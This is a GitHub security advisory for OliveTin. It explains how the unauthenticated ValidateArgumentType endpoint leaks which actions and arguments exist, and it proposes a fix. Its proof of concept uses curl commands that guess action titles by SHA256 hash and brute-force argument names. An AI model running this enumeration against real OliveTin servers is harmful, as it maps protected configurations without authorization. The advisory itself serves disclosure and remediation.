GHSA-F637-W7P2-M7FX

Vulnerability from github – Published: 2026-06-24 17:41 – Updated: 2026-06-24 17:41
VLAI
Summary
OliveTin: ValidateArgumentType API Endpoint's Missing Authentication Allows Action and Argument Enumeration
Details

Summary

The ValidateArgumentType RPC endpoint in service/internal/api/api.go does not perform any authentication or authorization checks. Unlike all other data-returning API endpoints, it does not call auth.UserFromApiCall or checkDashboardAccess. When AuthRequireGuestsToLogin is enabled (the security-conscious configuration), this endpoint remains accessible to unauthenticated users and can be used as an oracle to enumerate valid action binding IDs and their argument configurations.

Details

Root Cause

The ValidateArgumentType handler at service/internal/api/api.go:726 has no authentication check:

func (api *oliveTinAPI) ValidateArgumentType(ctx ctx.Context, req *connect.Request[apiv1.ValidateArgumentTypeRequest]) (*connect.Response[apiv1.ValidateArgumentTypeResponse], error) {
    if api.argumentNotFoundForValidation(req.Msg) {
        return nil, connect.NewError(connect.CodeNotFound, fmt.Errorf("action or argument not found for binding ID %s", req.Msg.BindingId))
    }

    err := api.validateArgumentTypeInternal(req.Msg)
    desc := ""
    if err != nil {
        desc = err.Error()
    }

    return connect.NewResponse(&apiv1.ValidateArgumentTypeResponse{
        Valid:       err == nil,
        Description: desc,
    }), nil
}

Compare this with adjacent endpoints that DO have auth checks:

// WhoAmI - has auth check
func (api *oliveTinAPI) WhoAmI(ctx ctx.Context, req *connect.Request[apiv1.WhoAmIRequest]) ... {
    user := auth.UserFromApiCall(ctx, req, api.cfg)
    if err := api.checkDashboardAccess(user); err != nil {
        return nil, err
    }
    ...
}

// GetDashboard - has auth check
func (api *oliveTinAPI) GetDashboard(ctx ctx.Context, req *connect.Request[apiv1.GetDashboardRequest]) ... {
    user := auth.UserFromApiCall(ctx, req, api.cfg)
    if err := api.checkDashboardAccess(user); err != nil {
        return nil, err
    }
    ...
}

Oracle Behavior

The endpoint provides different responses based on whether the binding and argument exist:

  • Valid binding + valid argument: Returns {valid: true/false, description: "..."} (200 OK)

  • Valid binding + invalid argument: Returns CodeNotFound error

  • Invalid binding: Returns CodeNotFound error

While the error messages for the last two cases are identical, an attacker who knows a valid binding ID (or can guess one from action title SHA256) can enumerate argument names by observing which ones return 200 OK vs CodeNotFound.

Binding ID Predictability

Binding IDs are SHA256 hashes of action titles (see service/internal/executor/executor_actions.go). Since action titles are typically short, human-readable strings (e.g., "Ping", "Restart Service", "Deploy"), an attacker can precompute hashes of likely titles and test them against this endpoint.

Scope

This finding is only meaningful when AuthRequireGuestsToLogin: true is configured. In the default configuration where guests have full dashboard access, the action information is already visible through the dashboard API. When AuthRequireGuestsToLogin is true, checkDashboardAccess blocks guest access to other endpoints but NOT to ValidateArgumentType.

PoC

Prerequisites

  • OliveTin instance with AuthRequireGuestsToLogin: true configured

Step 1: Verify other endpoints require auth

Confirm that regular endpoints reject unauthenticated requests:

curl -s -X POST http://localhost:1337/api/GetDashboard \
  -H "Content-Type: application/json" \
  -d "{}"
# Returns: CodePermissionDenied - "guests are not allowed to access the dashboard"

Step 2: Enumerate binding IDs via ValidateArgumentType

Test candidate binding IDs (SHA256 of guessed action titles):

# Test if an action titled "Ping" exists
BINDING_ID=$(echo -n "Ping" | sha256sum | cut -d" " -f1)
curl -s -X POST http://localhost:1337/api/ValidateArgumentType \
  -H "Content-Type: application/json" \
  -d "{\"bindingId\":\"$BINDING_ID\",\"argumentName\":\"test\",\"value\":\"x\",\"type\":\"ascii\"}"
# If action exists: returns CodeNotFound (argument "test" not found for this binding)
# If action does not exist: returns CodeNotFound (same message, but confirms the oracle)

Step 3: Enumerate argument names for a known binding

Once a valid binding ID is known, brute-force argument names:

# Test if argument "target" exists for the Ping action
curl -s -X POST http://localhost:1337/api/ValidateArgumentType \
  -H "Content-Type: application/json" \
  -d "{\"bindingId\":\"$BINDING_ID\",\"argumentName\":\"target\",\"value\":\"test\",\"type\":\"ascii\"}"
# If argument exists: returns {valid: true/false} (200 OK) -- CONFIRMED
# If argument does not exist: returns CodeNotFound error

Impact

  1. Information Disclosure: Unauthenticated users can enumerate which actions exist (by testing binding IDs) and which arguments each action accepts (by testing argument names). This reveals the server configuration to unauthorized parties.

  2. Reconnaissance for Further Attacks: The enumerated information (action names, argument names, argument types) provides valuable reconnaissance for more targeted attacks such as the ot_ prefix argument injection (see advisory 001) or social engineering.

  3. Limited Scope: This is only exploitable when AuthRequireGuestsToLogin: true is configured. In the default configuration, guests already have full access to the dashboard which exposes the same information.

Recommended Fix

Add authentication and dashboard access checks to the ValidateArgumentType handler, consistent with all other data-returning endpoints:

func (api *oliveTinAPI) ValidateArgumentType(ctx ctx.Context, req *connect.Request[apiv1.ValidateArgumentTypeRequest]) (*connect.Response[apiv1.ValidateArgumentTypeResponse], error) {
    // Add auth check consistent with other endpoints
    user := auth.UserFromApiCall(ctx, req, api.cfg)
    if err := api.checkDashboardAccess(user); err != nil {
        return nil, err
    }

    if api.argumentNotFoundForValidation(req.Msg) {
        return nil, connect.NewError(connect.CodeNotFound, fmt.Errorf("action or argument not found for binding ID %s", req.Msg.BindingId))
    }

    err := api.validateArgumentTypeInternal(req.Msg)
    desc := ""
    if err != nil {
        desc = err.Error()
    }

    return connect.NewResponse(&apiv1.ValidateArgumentTypeResponse{
        Valid:       err == nil,
        Description: desc,
    }), nil
}
Severity
3.7 (Low)
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/OliveTin/OliveTin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.0.0-20260521230847-a3865704c854"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-48709"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-862"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-06-24T17:41:01Z",
    "nvd_published_at": "2026-06-15T21:17:15Z",
    "severity": "LOW"
  },
  "details": "## Summary\n\nThe `ValidateArgumentType` RPC endpoint in `service/internal/api/api.go` does not perform any authentication or authorization checks. Unlike all other data-returning API endpoints, it does not call `auth.UserFromApiCall` or `checkDashboardAccess`. When `AuthRequireGuestsToLogin` is enabled (the security-conscious configuration), this endpoint remains accessible to unauthenticated users and can be used as an oracle to enumerate valid action binding IDs and their argument configurations.\n\n## Details\n\n### Root Cause\n\nThe `ValidateArgumentType` handler at `service/internal/api/api.go:726` has no authentication check:\n\n```go\nfunc (api *oliveTinAPI) ValidateArgumentType(ctx ctx.Context, req *connect.Request[apiv1.ValidateArgumentTypeRequest]) (*connect.Response[apiv1.ValidateArgumentTypeResponse], error) {\n    if api.argumentNotFoundForValidation(req.Msg) {\n        return nil, connect.NewError(connect.CodeNotFound, fmt.Errorf(\"action or argument not found for binding ID %s\", req.Msg.BindingId))\n    }\n\n    err := api.validateArgumentTypeInternal(req.Msg)\n    desc := \"\"\n    if err != nil {\n        desc = err.Error()\n    }\n\n    return connect.NewResponse(\u0026apiv1.ValidateArgumentTypeResponse{\n        Valid:       err == nil,\n        Description: desc,\n    }), nil\n}\n```\n\nCompare this with adjacent endpoints that DO have auth checks:\n\n```go\n// WhoAmI - has auth check\nfunc (api *oliveTinAPI) WhoAmI(ctx ctx.Context, req *connect.Request[apiv1.WhoAmIRequest]) ... {\n    user := auth.UserFromApiCall(ctx, req, api.cfg)\n    if err := api.checkDashboardAccess(user); err != nil {\n        return nil, err\n    }\n    ...\n}\n\n// GetDashboard - has auth check\nfunc (api *oliveTinAPI) GetDashboard(ctx ctx.Context, req *connect.Request[apiv1.GetDashboardRequest]) ... {\n    user := auth.UserFromApiCall(ctx, req, api.cfg)\n    if err := api.checkDashboardAccess(user); err != nil {\n        return nil, err\n    }\n    ...\n}\n```\n\n### Oracle Behavior\n\nThe endpoint provides different responses based on whether the binding and argument exist:\n\n- **Valid binding + valid argument**: Returns `{valid: true/false, description: \"...\"}` (200 OK)\n\n- **Valid binding + invalid argument**: Returns `CodeNotFound` error\n\n- **Invalid binding**: Returns `CodeNotFound` error\n\nWhile the error messages for the last two cases are identical, an attacker who knows a valid binding ID (or can guess one from action title SHA256) can enumerate argument names by observing which ones return 200 OK vs CodeNotFound.\n\n\n\n\n\n\n\n\n\n### Binding ID Predictability\n\nBinding IDs are SHA256 hashes of action titles (see `service/internal/executor/executor_actions.go`). Since action titles are typically short, human-readable strings (e.g., \"Ping\", \"Restart Service\", \"Deploy\"), an attacker can precompute hashes of likely titles and test them against this endpoint.\n\n### Scope\nThis finding is only meaningful when `AuthRequireGuestsToLogin: true` is configured. In the default configuration where guests have full dashboard access, the action information is already visible through the dashboard API.\nWhen `AuthRequireGuestsToLogin` is true, `checkDashboardAccess` blocks guest access to other endpoints but NOT to `ValidateArgumentType`.\n\n## PoC\n\n### Prerequisites\n\n- OliveTin instance with `AuthRequireGuestsToLogin: true` configured\n\n### Step 1: Verify other endpoints require auth\n\nConfirm that regular endpoints reject unauthenticated requests:\n\n```bash\ncurl -s -X POST http://localhost:1337/api/GetDashboard \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{}\"\n# Returns: CodePermissionDenied - \"guests are not allowed to access the dashboard\"\n```\n\n### Step 2: Enumerate binding IDs via ValidateArgumentType\n\nTest candidate binding IDs (SHA256 of guessed action titles):\n\n```bash\n# Test if an action titled \"Ping\" exists\nBINDING_ID=$(echo -n \"Ping\" | sha256sum | cut -d\" \" -f1)\ncurl -s -X POST http://localhost:1337/api/ValidateArgumentType \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"bindingId\\\":\\\"$BINDING_ID\\\",\\\"argumentName\\\":\\\"test\\\",\\\"value\\\":\\\"x\\\",\\\"type\\\":\\\"ascii\\\"}\"\n# If action exists: returns CodeNotFound (argument \"test\" not found for this binding)\n# If action does not exist: returns CodeNotFound (same message, but confirms the oracle)\n```\n\n### Step 3: Enumerate argument names for a known binding\n\nOnce a valid binding ID is known, brute-force argument names:\n\n```bash\n# Test if argument \"target\" exists for the Ping action\ncurl -s -X POST http://localhost:1337/api/ValidateArgumentType \\\n  -H \"Content-Type: application/json\" \\\n  -d \"{\\\"bindingId\\\":\\\"$BINDING_ID\\\",\\\"argumentName\\\":\\\"target\\\",\\\"value\\\":\\\"test\\\",\\\"type\\\":\\\"ascii\\\"}\"\n# If argument exists: returns {valid: true/false} (200 OK) -- CONFIRMED\n# If argument does not exist: returns CodeNotFound error\n```\n\n## Impact\n\n1. **Information Disclosure**: Unauthenticated users can enumerate which actions exist (by testing binding IDs) and which arguments each action accepts (by testing argument names). This reveals the server configuration to unauthorized parties.\n\n2. **Reconnaissance for Further Attacks**: The enumerated information (action names, argument names, argument types) provides valuable reconnaissance for more targeted attacks such as the `ot_` prefix argument injection (see advisory 001) or social engineering.\n\n3. **Limited Scope**: This is only exploitable when `AuthRequireGuestsToLogin: true` is configured. In the default configuration, guests already have full access to the dashboard which exposes the same information.\n\n## Recommended Fix\n\nAdd authentication and dashboard access checks to the `ValidateArgumentType` handler, consistent with all other data-returning endpoints:\n\n```go\nfunc (api *oliveTinAPI) ValidateArgumentType(ctx ctx.Context, req *connect.Request[apiv1.ValidateArgumentTypeRequest]) (*connect.Response[apiv1.ValidateArgumentTypeResponse], error) {\n    // Add auth check consistent with other endpoints\n    user := auth.UserFromApiCall(ctx, req, api.cfg)\n    if err := api.checkDashboardAccess(user); err != nil {\n        return nil, err\n    }\n\n    if api.argumentNotFoundForValidation(req.Msg) {\n        return nil, connect.NewError(connect.CodeNotFound, fmt.Errorf(\"action or argument not found for binding ID %s\", req.Msg.BindingId))\n    }\n\n    err := api.validateArgumentTypeInternal(req.Msg)\n    desc := \"\"\n    if err != nil {\n        desc = err.Error()\n    }\n\n    return connect.NewResponse(\u0026apiv1.ValidateArgumentTypeResponse{\n        Valid:       err == nil,\n        Description: desc,\n    }), nil\n}\n```",
  "id": "GHSA-f637-w7p2-m7fx",
  "modified": "2026-06-24T17:41:01Z",
  "published": "2026-06-24T17:41:01Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/security/advisories/GHSA-f637-w7p2-m7fx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48709"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/commit/a3865704c854061452a4ab5f6d95de3312698ccd"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/OliveTin/OliveTin"
    },
    {
      "type": "WEB",
      "url": "https://github.com/OliveTin/OliveTin/releases/tag/3000.13.0"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "OliveTin: ValidateArgumentType API Endpoint\u0027s Missing Authentication Allows Action and Argument Enumeration"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.





Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.

Sightings

Author Source Type Date Other

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Detection rules are retrieved from Rulezet.